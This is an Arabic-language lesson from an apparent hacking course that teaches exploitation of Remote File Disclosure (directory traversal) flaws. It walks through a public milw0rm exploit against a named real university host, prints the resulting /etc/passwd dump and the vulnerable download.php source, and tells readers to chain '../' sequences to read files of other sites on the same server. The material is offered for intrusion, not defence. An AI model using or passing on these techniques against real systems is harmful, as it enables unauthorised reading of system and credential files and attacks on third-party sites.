السلام عليكم و رحمة الله وبركاته


--==/=/=/=/=/=/================================================== ===================/=/=/=/=/=/==--
الدورة التعليمية لاختراق المواقع و السيرفرات مقدمة من طرف
ASDELY & SCORPION
--==/=/=/=/=/=/================================================== ===================/=/=/=/=/=/==--
--==/=/=/=/=/=/=========================================/=/=/=/=/=/==--
شرح استغلال ثغرات Remote File Disclosure
--==/=/=/=/=/=/=========================================/=/=/=/=/=/==--
تفيدنا ثغرات Remote File Disclosure في قراءة ملفات حق سرفر الموقع , وبذلك ممكن قراءة ملفات مهمة تفيدنا في الاختراق مثل ملفات /etc/ (passwd , valiases..) كما بامكاننا
قراءة ملفات اي موقع بالسرفر لكن مع احترام مكانه في السرفر .
اولا سوف نشرح على ثغرة في سكربت USP FOSS Distribution , رابط الثغرة : http://www.milw0rm.com/exploits/3794
اوكي سوف امر الى التطبيق مباشرة لان تم شرح كيفية التعامل مع ثغرات الملورم في دروس سابقة
>>
################################################## #################################
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
................
################################################## #################################


كما لاحضتم تم قراءة محتوى ملف /etc/passwd
ملاحضة هامة : لقراءة ملف ما وارد بالموقع اللي مصاب بالثغرة (riemann.usp.ac.fj/~uspfoss/ في مثالنا الحالي) يكفي التلاعب بهذه العلامة التي تدل على خطوة الى الوراء : ../
مثلا نعلم ان الملف download.php وارد عالموقع واريد رأية السرس كود حقه :
>>
################################################## #################################
<?php
// <!--sphider_noindex-->
$file = @$_GET['dnld'];
header('Content-Description: File Transfer');
header('Content-Type: application/force-download');
header('Content-Length: ' . filesize($file));
header('Content-Disposition: attachment; filename=' . basename($file));
readfile($file);
// <!--/sphider_noindex-->
?>
################################################## #################################
>>
ملاحضة : لو اردنا قراءة ملف حق موقع اخر بالسرفر يكفي التلاعب بهذه العلامات ../../../../../../ لكن مع احترام المسار اللي حصلنا عليها عند قراءة ملف /etc/passwd
انتهى الشرح